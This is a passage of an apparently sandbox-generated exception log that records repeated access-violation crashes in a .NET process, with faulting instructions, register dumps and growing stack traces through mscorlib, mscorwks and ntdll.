registers.esp: 90826824
registers.ebp: 90826856
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545361.93775
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90826648
registers.ebp: 90826680
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545361.95375
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90826648
registers.ebx: 40148980
registers.esp: 90826648
registers.ebp: 90826680
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545363.48475
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90826472
registers.ebp: 90826504
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545363.50075
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90826472
registers.ebx: 40148980
registers.esp: 90826472
registers.ebp: 90826504
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545365.01575
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90826296
registers.ebp: 90826328
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545365.01575
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90826296
registers.ebx: 40148980
registers.esp: 90826296
registers.ebp: 90826328
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545366.56275
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90826120
registers.ebp: 90826152
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545366.56275
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90826120
registers.ebx: 40148980
registers.esp: 90826120
registers.ebp: 90826152
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545368.09375
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825944
registers.ebp: 90825976
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545368.09375
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
registers.ecx: 0
registers.edx: 90825944
registers.ebx: 40148980
registers.esp: 90825944
registers.ebp: 90825976
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545369.62575
__exception__
exception.address: 0x8412fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 aa 6c eb 11 8b c8 e8 a2 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 40148980
registers.esp: 90825768
registers.ebp: 90825800
registers.esi: 40146668
registers.edi: 0
stacktrace:
0x840f3a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
0x840f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545369.62575
__exception__
exception.address: 0x84131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 aa 6c eb 11 8b c8 e8 82 43 e9 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 8655640
